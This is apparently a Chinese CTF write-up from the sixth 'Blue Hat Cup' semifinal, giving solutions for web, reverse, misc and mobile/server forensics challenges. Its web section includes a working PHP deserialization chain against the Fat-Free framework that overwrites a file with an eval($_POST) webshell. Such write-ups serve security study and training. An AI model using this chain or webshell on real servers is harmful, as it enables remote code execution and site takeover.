当前位置:网站首页>第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
2022-08-09 12:29:00 【Pysnow】
总榜38,地区第四: )
文章目录
CTF
web
easyfatfree:
www.zip 下载源码,这又是一道原题,wmctf2020 那个 rce 链子能用,但是因为 disable_fucntion 禁用得太狠了,代码执行也没什么办法,可以直接用 2020ciscn 拿到 easyunserialze 的写文件链子,(没有写文件的权限但是有覆盖文件的权限) 覆盖任意一个 php 文件,然后蚁剑连上就可以拿到 flag 了,因为蚁剑自带绕过 open_basir 的功能,给出 exp 如下https://blog.csdn.net/mochu7777777/article/details/108327699
<?php
namespace DB;
//! In-memory/flat-file DB wrapper
class Jig {
//@{ Storage formats
const
FORMAT_JSON=0,
FORMAT_Serialized=1;
//@}
protected
//! Storage location
$dir = '/var/www/html/',
//! Current storage format
$format = 'self::FORMAT_JSON',
//! Memory-held data
$data = array('lib/utf.php'=>array("a'=>'<?php eval(\$_POST['p']); ?>")),
//! lazy load/save files
$lazy = TRUE;
/** * Read data from memory/file * @return array * @param $file string **/
}
$jig = new jig();
echo urlencode(serialize($jig));
re
babynim
** 大数相除** **
除数
56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471
被除数
**51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
a = 56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471
b = 51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
print(b//a)
flag{923973256239481267349126498121231231}
misc
神秘的日志
日志搜索 NTLM,发现有两个
有两个时间点**
2022/4/17 11:27:06
2022/4/16 17:31:01
**在 security 日志中找到那个时间点的 NTLM,有五个,导出如下
一个一个 flag 试,发现最后一个 flag 提交正确**
**
flag:flag{dafd0428f634aefd1ddb26f8257c791f}
取证
手机取证_1
** iPhone 手机的 iBoot 固件版本号:(答案参考格式:iBoot-1.1.1)** **
用盘古石手机取证系统导入 iPhone 文件夹,查看设备信息,找到 iBoot 固件版本号。
**flag:iBoot-7429.62.1
exe 分析_1
将程序拖进微步云沙箱,可以看到启动进程位置
C:\Program Files\Common Files\Services\WmiApSvr.exe
exe 分析_2
拖进 ida 就可以看到导入 dll
答案是:是
exe 分析_3
用 x32dbg 调试程序
查看进程的详细信息就可以找到程序名
exe 分析_4
在微步云沙箱搜索文件的哈希值即文件名
挖矿程序
exe 分析_5
在虚拟机运行起来,通过 wireshark 看到一个 ip,查询位置
韩国
APK 分析_01
** 受害人手机中 exec 的序列号是:(答案参考格式:0xadc)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,模糊搜索 exec,找到应用,导出到桌面。
用 jadx-gui 打开 apk,查看证书,找到序列号。
**flag:0x936eacbe07f201df
APK 分析_02
** 受害人手机中 exec 关联服务器地址是:(答案参考格式:asd.as.d)** **
** 使用 Jadx 分析 apk,首先看 MainActivity 主函数,发现有一个 Base64 加密后的密文,解密后得到明文: https://ansjk.ecxeio.xyz
** 分析代码发现这个加密算法是在 t( ) 方法里的,查找 t( ) 方法哪里被引用了,发现没有引用的地方,只能换个思路。t( ) 方法所在的 MainActivity 类继承 h 类,分析 h 类。** **
** 发现 t( ) 方法在 h 类中是一个抽象方法(没有方法体,只有声明。抽象方法的具体的实现在子类中,即 MainActivity 类里),随后又发现 loadUrl( ) 方法调用了 t( ) 方法。 **
**
** 说明 loadUrl( ) 加载了 t( ) 里的 https://ansjk.ecxeio.xyz,说明程序的服务器地址就是 t() 方法里的网址。
**flag:ansjk.ecxeio.xyz
APK 分析_03
** 受害人手机中 exec 加载服务器的函数是 :(答案参考格式:asda)** **
根据 APK 分析_02 的分析可知:exec 加载服务器的函数应该是:loadUrl( )
**flag:loadUrl
APK 分析_04
** 受害人手机中 exec 的打包 ID 是:(答案参考格式:adb.adb.cn)** **
根据答案参考格式,猜测 ID 是个网址,将文件拖进 AndroidKiller 里查看,搜索.cn,发现一个网址字符串。
提交正确。
**flag:W2Anansjy.com.cn
APK 分析_05
** 受害人手机中 exec 的是否有安全检测行为?** **
查找字符串"安全",发现有检测手机 root 的提示,说明有安全检测。
**
flag:是
APK 分析_06
** 受害人手机中 exec 的检测方法的完整路径和方法名是:(答案参考格式:a.a.a())** **
** 找到字符串,所在方法是所在类 h,分析代码结合 MainActivity 主类中的方法,发现 h 类其实就是 MainActivity,程序将它单独拿出来了,MainActivity( ) 通过继承的方式进行调用,h 类实际是一个开发业务逻辑的类。** **
** 既然是开发业务逻辑的类,必然有安全检测的方法,分析代码,发现 onCreate() 方法中有安全检测,并有安全提醒的字符串。着重分析 onCreate() 方法中有安全提醒字符串这一部分。分析发现每一个安全提醒的字符串触发都是通过一个 if 判断,这个 if 判断条件里的方法都是 a 类中的方法,怀疑 a 类就是安全检测的类,跟进 a 类。** **
** 根据 a 类中的方法名,变量名可知,该类就是安全检测的类。 **
**flag:d.a.a.c.a.a()
APK 分析_07
** 受害人手机中 exec 有几个界面:(答案参考格式:2)** **
一个 APK 每创建一个界面(Activity),都要在 AndroidManifest.xml 中注册,查看 AndroidManifest.xml。
发现注册了三个 activity,activity-alias 是为 activity 起了个别名,也就是说 com.kmcjrz.bsesai.newActivity 实际指的就是 minmtta.hemjcbm.ahibyws.MainActivity。
**flag:3
APK 分析_08
** 受害人手机中红星 IPA 的包名是:(答案参考格式:a.s.d)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。
搜索可知 IPA 是 Apple 程序应用文件 iPhoneApplication 的缩写,简单来说就是 Apple 程序的 APK,实质还是一个压缩包,解压红星.ipa。
**
IPA 文件解压器解压,得到 ayload 文件,打开 Payload 文件,里面有对应的.app 文件,搜索 info.plist 文件,用 plist Editor 查看,搜索 bundle,找到包名。
flag:com.dd666.hongxin
APK 分析_09
** 受害人手机中红星 IPA 的 APIKEY 是:(答案参考格式:asd)** **
在 info.plist 文件中,搜索 APIKEY 找到内容。
**flag:d395159c291c627c9d4ff9139bf8f0a700b98732
APK 分析_10
** 受害人手机中红星 IPA 的权限有哪些?** **
在 info.plist 文件中,寻找有关权限内容,发现四个权限申请。
**
flag:相册,定位,摄像头,麦克风
APK 分析_11
** 嫌疑人手机中红星 APK 的服务器地址是:(答案参考格式:ass.a.d:11)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。
跟据提示要求寻找服务器网址,搜索字符串:“url”,发现与题目格式相一致的网址。
提交正确。
**flag:www.nansjy.com.cn:8161
APK 分析_12
** 嫌疑人手机中红星 APK 的程序入口是:(答案参考格式:a.v.b.n)** **
用 Android Killer 打开红星.apk,找到红星 APK 的程序入口名。
**
flag:com.example.weisitas526sad.activity.SplashActivity
APK 分析_13
** 嫌疑人手机中分析聊天工具,服务器的登录端口是:(答案参考格式:12)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,打开应用列表,寻找聊天应用,发现应用 BigAnt5 疑似聊天工具。
网上搜索可得 BigAnt5 是聊天软件,搜索 BigAnt5 端口号。
**
搜索可得 BigAnt5 端口号为 6661。
flag:6661
服务器取证_05
通过观察我博客的宝塔面板,可以发现宝塔下载的软件存在于两个地方,/www/server 和/www/server/panel/plugin 这两个文件夹下,然后出去那几个不是软件的文件,计算出来如下**
**
linuxsys webshh mysql nginx php phpmyadmin
答案:6
服务器取证_15
计算机取证,搜索关键词你好**
在此基础上搜索 怎么充值
找到一个数据库备份文件,然后导出打开它搜索关键词找到用户名为
**答案:hm688
边栏推荐
- 用 API Factory 产品生成 API 文档
- novel research
- Redis源码剖析之robj(redisObject)
- Customize VIEW to realize in-app message reminder to rotate up and down
- 中断系统结构及中断控制详解
- Flutter Getting Started and Advanced Tour (3) Text Widgets
- ABAP interview questions: how to use the System CALL interface of the ABAP programming language, direct execution ABAP server operating System's shell command?
- OOM排查和处理
- 生成上传密钥和密钥库
- 报告:想学AI的学生数量已涨200%,老师都不够用了
猜你喜欢
Rust from entry to proficient 04 - data types
数字化转型之支撑保障单元
Flutter入门进阶之旅(六)Layout Widget
#物联网征文#小熊派设备开发实战
Rust从入门到精通04-数据类型
史上最猛“员工”,疯狂吐槽亿万富翁老板小扎:那么有钱,还总穿着同样的衣服!...
一甲子,正青春,CCF创建六十周年庆典在苏州举行
ABAP 报表中如何以二进制方式上传本地文件试读版
Manchester city launch emotional intelligence scarf can be detected, give the fans
新起之秀 DPU,正在掀起数据中心变革!
随机推荐
在已打开图片上加水印(文字)
位图与位运算
K个结点的组内逆序调整
两个链表相加
苹果Meta都在冲的Pancake技术,中国VR团队YVR竟抢先交出产品答卷
合并两个有序列表
MySQL5.6到8.0的账号迁移
微服务架构的核心关键点
AI basketball referee, walking is special, ask harden care don't care
Introduction to Flutter advanced trip Dialog&Toast (10)
Fragment中嵌套ViewPager数据空白页异常问题分析
荣耀携手Blue Yonder,加快企业战略增长
8、IDEA提交代码出现: Fetch failed fatal: Could not read from remote repository
Flutter Getting Started and Advanced Tour (7) GestureDetector
大佬们,请教一下,我看官方文档中,sqlserver cdc只支持2012版之后的,对于sqlser
史上最猛“员工”,疯狂吐槽亿万富翁老板小扎:那么有钱,还总穿着同样的衣服!...
中断系统结构及中断控制详解
Flutter Getting Started and Advanced Tour (2) Hello Flutter
[Microservice ~ Remote Call] Integrate RestTemplate, WebClient, Feign
Flutter入门进阶之旅(三)Text Widgets